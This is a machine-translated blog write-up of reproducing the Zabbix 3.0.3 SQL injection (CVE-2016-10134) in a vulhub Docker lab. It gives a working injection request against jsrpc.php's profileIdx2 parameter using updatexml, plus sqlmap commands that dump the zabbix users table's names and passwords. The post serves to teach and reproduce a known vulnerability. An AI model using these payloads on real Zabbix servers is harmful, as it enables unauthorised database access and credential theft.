当前位置:网站首页>[vulhub shooting range]] ZABBIX SQL injection (cve-2016-10134) vulnerability recurrence
[vulhub shooting range]] ZABBIX SQL injection (cve-2016-10134) vulnerability recurrence
2022-06-24 07:29:00 【Refused guanxiaotong for many times】
List of articles
Preface
A few days ago, a little friend asked me to repeat this loophole , It can't be said to be repeated , The database cannot read , It's strange . So while I have this time today , Just do it , Take notes by the way .
Tips : The following is the main body of this article , The following cases can be used for reference
One 、 Introduction to loopholes
zabbix What is it? ?
zabbix Is a server monitoring software , The reason is server、agent、web And so on , among web Module by PHP To write , Used to display the results in the database .
Vulnerability environment
stay vulhub The range is reproduced , start-up zabbix 3.0.3.
Two 、 Repeat step
1. Start the vulnerability environment
Get into zabbix Catalog ,cd Get into CVE-2016-10134 Catalog , Enter the following command to start the range :
docker-compose up -d

After executing the command , Will start the database (mysql)、zabbix server、zabbix agent 、zabbix web. If the memory is a little small , There may be a situation where a container hangs up .
When all services are displayed done, To successfully visit :
After startup , Wait a moment , visit http://your-ip/8080, Successfully visited zabbix Interface .

2.sql Inject
zabbix Of jsrpc.php Page exists sql Loophole , So by visiting this jsrpc.php Page to trigger the vulnerability , Vulnerability parameter is profileIdx2. Send the following request package to execute sql command , Get database information .
The request package information is as follows :
GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: zbx_sessionid=7689b1e30e63d9726fa86010d3c6592c; PHPSESSID=3r69f0snsemtpmkeiocgg9blj2
Upgrade-Insecure-Requests: 1

Successfully executed user() command , And return the information .
speak user() Modified into database(), Try to get the database name :
http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,database()),0)

If you are lazy, you can also use tools directly sqlmap, Everything came out after running , No experience :
sqlmap -u "http://192.168.25.130:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1"

The user name and password are also fixed directly :
sqlmap -u "http://192.168.25.130:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1" -D zabbix -T users -C name,passwd --dump

summary
It is an ordinary injection recurrence , There's no bypass , No difficulty .
Original article , Welcome to reprint , Please indicate the source of the article : 【Vulhub shooting range 】zabbix-SQL Inject (CVE-2016-10134) Loophole recurrence . Baidu and all kinds of collection stations are not credible , Search carefully to identify . Technical articles generally have timeliness , I am used to revise and update my blog posts from time to time , So visit the source to see the latest version of this article .
边栏推荐
- 湖北专升本-湖师计科
- The first common node of two linked lists_ The entry of the link in the linked list (Sword finger offer)
- 【均衡器】LS均衡器,DEF均衡器以及LMMSE均衡器的误码率性能对比仿真
- What is the mentality of spot gold worth learning from
- bjdctf_2020_babystack
- 游戏思考14:对cache_server缓冲服务器的问题思考(读云峰博客有感)
- 简单使用Modbus转BACnet网关教程
- Software performance test analysis and tuning practice path - JMeter's performance pressure test analysis and tuning of RPC Services - manuscript excerpts
- 【图像融合】基于伪 Wigner 分布 (PWD) 实现图像融合附matlab代码
- Huawei cloud database advanced learning
猜你喜欢

Huawei cloud image engine service
![[WUSTCTF2020]alison_likes_jojo](/img/a9/dcc6f524772cd0b8781289cbaef63f.png)
[WUSTCTF2020]alison_likes_jojo
![[GUET-CTF2019]zips](/img/79/22ff5d4a3cdc3fa9e0957ccc9bad4b.png)
[GUET-CTF2019]zips

Dichotomous special training

伦敦金的资金管理比其他都重要

20 not to be missed ES6 tips

使用SystemParametersInfo访问用户界面设置

RDD basic knowledge points

前缀和专题训练
![[image fusion] image fusion based on pseudo Wigner distribution (PWD) with matlab code](/img/e0/14cd7982fb3059fed235470d91126e.png)
[image fusion] image fusion based on pseudo Wigner distribution (PWD) with matlab code
随机推荐
How can win11 set the CPU performance to be fully turned on? How does win11cpu set high performance mode?
[WordPress website] 5 Set code highlight
[WUSTCTF2020]alison_ likes_ jojo
OMX initialization process
An example of MySQL accidental deletion recovery - using Myflash
Accelerate large-scale data analysis based on Apache iceberg through data organization optimization
Can the small fire Chunfeng tea make its debut by "keeping fit"?
【Vulhub靶场】】zabbix-SQL注入(CVE-2016-10134)漏洞复现
[image fusion] multi focus and multi spectral image fusion based on pixel saliency and wavelet transform with matlab code
[WUSTCTF2020]alison_likes_jojo
MFC multithreaded semaphore csemaphore critical area and mutually exclusive events
伦敦金的资金管理比其他都重要
MFC使用控制台时 项目路径中不能有空格和中文,否则会报错误 LNK1342 未能保存要编辑的二进制文件的备份副本等
【图像融合】基于像素显着性结合小波变换实现多焦点和多光谱图像融合附matlab代码
Win11怎么设置让CPU性能全开?Win11CPU怎么设置高性能模式?
High energy ahead: Figure 18 shows you how to use the waterfall chart to visually reflect data changes
Leetcode probability interview shock series 11~15
MFC多线程 信号量CSemaphore 临界区与互斥 事件
bjdctf_ 2020_ babystack
基因检测,如何帮助患者对抗疾病?